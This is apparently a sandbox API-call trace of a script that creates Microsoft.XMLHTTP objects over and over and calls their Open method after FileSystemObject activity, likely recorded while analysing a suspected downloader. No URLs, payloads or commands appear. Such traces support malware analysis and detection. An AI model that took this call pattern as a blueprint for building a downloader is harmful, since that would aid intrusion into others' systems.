	[0536.820] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0536.820] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0536.820] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0536.820] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0537.900] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0537.900] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0537.900] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0537.901] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0537.901] SysStringLen (param_1=0x0) returned 0x0
	[0537.901] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0537.901] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0537.901] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0537.901] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0537.901] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0537.902] ??2@YAPEAX_K@Z () returned 0x62f330
	[0537.902] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0537.902] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0537.902] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0537.902] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0537.902] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0537.902] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0537.902] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0537.904] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0537.904] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0537.904] SysStringLen (param_1=0x0) returned 0x0
	[0537.905] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0537.905] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0537.905] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0537.905] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0537.905] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0537.905] ??2@YAPEAX_K@Z () returned 0x62f310
	[0537.905] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0537.905] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0537.905] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0537.905] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0537.905] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0537.905] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0537.905] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0537.905] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0537.906] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0537.906] SysStringLen (param_1=0x0) returned 0x0
	[0537.906] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0537.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0537.906] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0537.906] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0537.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0537.906] ??2@YAPEAX_K@Z () returned 0x62f330
	[0537.906] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0537.906] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0537.906] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0537.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0537.906] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0537.906] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0537.906] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0537.960] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0537.960] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0537.960] SysStringLen (param_1=0x0) returned 0x0
	[0537.960] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0537.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0537.961] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0537.961] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0537.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0537.961] ??2@YAPEAX_K@Z () returned 0x62f310
	[0537.961] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f310) 
	[0537.961] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0537.961] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0537.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0537.961] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0537.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0537.961] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0537.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0537.961] longjmp () 
	[0537.962] longjmp () 
	[0537.962] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0537.962] SysStringLen (param_1=0x0) returned 0x0
	[0537.962] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0537.962] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0537.962] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0537.962] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0537.962] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0537.962] ??2@YAPEAX_K@Z () returned 0x62f330
	[0537.962] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0537.962] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0537.962] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0537.962] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0537.962] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0537.962] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0537.962] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0537.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0537.963] longjmp () 
	[0537.963] longjmp () 
	[0537.963] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0537.963] SysStringLen (param_1=0x0) returned 0x0
	[0537.963] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0537.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0537.963] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0537.963] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0537.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0537.963] ??2@YAPEAX_K@Z () returned 0x62f310
	[0537.963] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0537.963] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0537.963] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0537.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0537.963] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0537.964] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
